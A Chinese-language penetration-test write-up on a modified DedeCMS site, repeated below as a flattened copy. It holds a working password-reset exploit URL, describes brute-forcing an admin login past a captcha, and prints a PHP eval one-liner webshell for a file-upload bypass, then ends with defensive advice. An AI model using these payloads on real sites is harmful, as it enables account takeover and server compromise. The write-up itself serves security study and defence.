实战项目|对dedecms二改后的真实渗透
字数 1217 2025-08-11 00:55:07

实战项目:对DedeCMS二次修改后的渗透测试教学文档


1. 项目背景

  • 目标系统:DedeCMS(织梦内容管理系统)二次修改版本
  • 系统特点:PHP开源CMS,常见于国内中小型网站,历史漏洞较多
  • 渗透目标:通过信息收集、漏洞利用、权限提升获取服务器权限

2. 信息收集阶段

  1. 基础信息确认

    • CMS类型:DedeCMS(通过浏览器插件识别)
    • 服务器环境:Windows Server + Apache
    • 编程语言:PHP
  2. 敏感文件探测

    • robots.txt:发现测试账号test1(无密码)
    • 目录扫描(御剑工具):
      • 网站源码压缩包(可能泄露数据库配置)
      • 前台登录地址(如/login.php
  3. 接口与参数分析

    • 检查网络请求中的带参数URL(如?id=1),测试XSS、SQL注入等(本案例仅发现XSS,无直接利用价值)

3. 漏洞利用

  1. Nday漏洞利用

    • 漏洞名称:DedeCMS前台任意用户密码修改漏洞
    • Payload
      /member/resetpassword.php?dopost=safequestion&id=1&userid=admin&safequestion=00&safeanswer=0&vdcode=[验证码]
      
    • 利用步骤
      1. 修改id参数遍历用户(发现id=1对应管理员hejun)。
      2. 替换userid为目标用户(如hejun),提交后访问返回的URL(需删除amp;等编码字符)。
      3. 成功重置密码(如hejun的密码被修改为admin888)。
  2. 后台路径爆破

    • 使用工具(如GitHub开源后台扫描器)发现后台地址:/dede/login.php(非默认路径)。
  3. 弱口令登录

    • 爆破管理员账号hejun,密码admin888(通过BurpSuite+验证码识别插件绕过)。

4. 权限提升与Getshell

  1. 后台功能点测试

    • 发现部分功能报错,但存在文件上传点(如“上传新文件”)。
  2. 文件上传绕过

    • 上传图片马(如shell.jpg),内容为伪装的一句话木马:
      <?php @eval($_POST['cmd']);?>
      
    • 修改后缀为.php或利用解析漏洞(如Apache畸形解析)。
  3. 连接Webshell

    • 使用蚁剑连接上传的Shell,获取服务器权限。

5. 关键技巧总结

  • 信息收集:优先检查robots.txt、压缩包、默认后台路径。
  • Nday利用:结合已知漏洞和参数遍历(如id越权)。
  • 验证码绕过:使用BurpSuite插件(如captcha-killer)自动化识别。
  • 文件上传:结合后缀修改、内容伪装、解析漏洞绕过WAF。

6. 防御建议

  • 系统层:升级DedeCMS至最新版本,关闭不必要的功能(如前台密码重置)。
  • 权限控制:限制后台访问IP,禁用弱口令。
  • 文件上传:校验文件类型与内容,禁止执行上传目录的PHP文件。

7. 资源附录

  • 工具清单
    • 御剑(目录扫描)
    • BurpSuite(漏洞利用、爆破)
    • 蚁剑(Webshell管理)
  • 插件推荐:BurpSuite验证码识别插件(需配置OCR接口)。

:实际渗透需遵守法律,本文仅用于技术研究。

实战项目:对DedeCMS二次修改后的渗透测试教学文档 1. 项目背景 目标系统 :DedeCMS(织梦内容管理系统)二次修改版本 系统特点 :PHP开源CMS,常见于国内中小型网站,历史漏洞较多 渗透目标 :通过信息收集、漏洞利用、权限提升获取服务器权限 2. 信息收集阶段 基础信息确认 : CMS类型:DedeCMS(通过浏览器插件识别) 服务器环境:Windows Server + Apache 编程语言:PHP 敏感文件探测 : robots.txt :发现测试账号 test1 (无密码) 目录扫描(御剑工具): 网站源码压缩包(可能泄露数据库配置) 前台登录地址(如 /login.php ) 接口与参数分析 : 检查网络请求中的带参数URL(如 ?id=1 ),测试XSS、SQL注入等(本案例仅发现XSS,无直接利用价值) 3. 漏洞利用 Nday漏洞利用 : 漏洞名称 :DedeCMS前台任意用户密码修改漏洞 Payload : 利用步骤 : 修改 id 参数遍历用户(发现 id=1 对应管理员 hejun )。 替换 userid 为目标用户(如 hejun ),提交后访问返回的URL(需删除 amp; 等编码字符)。 成功重置密码(如 hejun 的密码被修改为 admin888 )。 后台路径爆破 : 使用工具(如GitHub开源后台扫描器)发现后台地址: /dede/login.php (非默认路径)。 弱口令登录 : 爆破管理员账号 hejun ,密码 admin888 (通过BurpSuite+验证码识别插件绕过)。 4. 权限提升与Getshell 后台功能点测试 : 发现部分功能报错,但存在文件上传点(如“上传新文件”)。 文件上传绕过 : 上传图片马(如 shell.jpg ),内容为伪装的一句话木马: 修改后缀为 .php 或利用解析漏洞(如Apache畸形解析)。 连接Webshell : 使用蚁剑连接上传的Shell,获取服务器权限。 5. 关键技巧总结 信息收集 :优先检查 robots.txt 、压缩包、默认后台路径。 Nday利用 :结合已知漏洞和参数遍历(如 id 越权)。 验证码绕过 :使用BurpSuite插件(如 captcha-killer )自动化识别。 文件上传 :结合后缀修改、内容伪装、解析漏洞绕过WAF。 6. 防御建议 系统层 :升级DedeCMS至最新版本,关闭不必要的功能(如前台密码重置)。 权限控制 :限制后台访问IP,禁用弱口令。 文件上传 :校验文件类型与内容,禁止执行上传目录的PHP文件。 7. 资源附录 工具清单 : 御剑(目录扫描) BurpSuite(漏洞利用、爆破) 蚁剑(Webshell管理) 插件推荐 :BurpSuite验证码识别插件(需配置OCR接口)。 注 :实际渗透需遵守法律,本文仅用于技术研究。